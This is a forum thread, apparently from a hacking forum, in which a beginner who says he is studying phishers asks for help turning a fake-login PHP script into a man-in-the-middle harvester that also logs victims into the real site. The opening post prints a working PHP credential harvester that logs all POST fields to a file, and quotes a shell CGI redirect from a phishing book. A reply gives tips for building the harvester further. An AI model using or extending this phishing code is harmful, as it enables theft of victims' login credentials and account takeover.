Jump to content

Php script - MITM POST with auto-login


glum
 Share

Recommended Posts

Hello everyone, first of all just wanted to introduce myself, and hope that I can learn from this forum and also contribute to the sharing of knowledge =)

I am trying to learn more about phishers and some of the techniques they use nowadays. And because my PHP is really bad (I'm trying to work on it =P) I was wondering if you could help me with creating a script that not only logs an imput text, but also uses that text as a login in the real page.

After some research I learned about the basic fake login script:

<?php
header ('Location: http://failedloginpage');
$handle = fopen("credentials.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
 

Where after loging in you are redirected to the real page with a failed login.

After some more research I found a book called Phishing Exposed where there was this code that allowed to record credentials and use them to send POST to the real website with the user credentials.

#!/bin/sh
PATH=/bin:/usr/bin:/usr/local/bin
RSERVER=bank.securescience.net/bank
URI='echo "${REQUEST_URI}" | sed -e 's@.*/cgi/@/cgi/@''
# Give CGI header and start web page
echo "Status: 301 Moved
Content-Type: text/html
Location: http://${RSERVER}${URI}
<html>
<body>
This page has moved to
<a href=\"http://${RSERVER}${URI}\">http://${RSERVER}${REQUEST_URI}</a>
</body>
</html>"


 
This code takes the URI in REQUEST_URI and removes everything up to
/cgi/ (provided /cgi/ is contained within the URI) and places the results in URI.
For example, if REQUEST_URI were http://foo.com/stuff/cgi/Login.cgi, the
URI would be /cgi/Login.cgi.Then when a header and HTML are sent to the
client’s browser, stating that we have a different location, the request will trans-
parently move to http://bank.securescience.net/cgi/Login.cgi

I know this is probably pretty simple, but I am a begginer regarding scripting, so can you please help me make sense of this? What would I need to implement in the first script to be able to do the redirecting?

Thank you =)

Link to comment
Share on other sites

<?php
header ('Location: http://failedloginpage');
$handle = fopen("credentials.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
 
Looking at that code, the first thing it does, is move you to another page, since header location is the first command, the rest of the code, is not going to execute(or shouldn't), since you should automatically be moved to the "failedloginpage", the rest should be ignored.

Basically, if your collecting credentials, depending on the form used on the site/page, you need a few things here. 1, log file, which you're good with the credentials.txt. Make sure the file exists first, if not, create it, then do a check for the file exists, if exists, then always append, otherwise, create file, then write to it.

2, a function that takes the form post or get data from a fake login page, that posts the credentials you want and writes it to the txt file.

Not going to write you the whole code for you, but thats just some tips to get you going in the right direction. Search the forums, I helped someone with a credential harvester script for Jasegar, that does what you want above, which you can mod and make work for what you are after though. Should be easily adaptable to whatever you want to do with it. I use a version of the same thing for honeypots and fake logins to my own sites and record brute force attempts on my sites.

ie: http://www.attack-scanner.com/brutes/brutes.log

Edited by digip
Link to comment
Share on other sites

Thank you for your help digip. Actually, although I only tested it on my own computer, the first script works fine, the credentials are logged in and even if the file credentials.txt isn't there it is somehow createde by the script.

The problem I was having was with the logging in the real page for the client, besides just redirecting him to the "login failed" page. I will try to find your post then and study it =)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...